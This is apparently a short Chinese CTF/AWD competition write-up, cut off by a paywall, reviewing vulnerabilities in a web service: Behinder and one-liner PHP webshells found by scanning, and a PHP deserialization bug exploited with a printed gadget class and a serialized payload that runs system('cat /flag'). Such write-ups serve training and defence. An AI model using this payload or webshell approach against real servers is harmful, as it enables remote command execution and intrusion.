本文详细复现了北极星杯AWD比赛中遇到的漏洞和利用方法,包括冰蝎后门、SQL注入、命令执行、文件上传、反序列化漏洞等,并展示了批量操作的脚本示例,强调了脚本在比赛中的重要性。
北极星杯 awd复现
服务器共有3个web和一个pwn
web1
1,down下web1的源码,使用D盾扫描:
2,漏洞1:发现三个冰蝎的木马,和一个一句话木马
冰蝎的后门需要使用冰蝎的客户端进行连接:如图:
一句话木马直接使用菜刀或蚁剑连接即可:
3,漏洞2:sqlhelper.php的反序列化漏洞:
构造payload:
class A{
public $name;
public $male;
function __destruct(){
$a = $this->name;
$a($this->male);
}
}
$s = new A;
$a = serialize($s);
echo $a;
构造payload得:
O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};<
最低0.47元/天 解锁文章
扫一扫
754
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
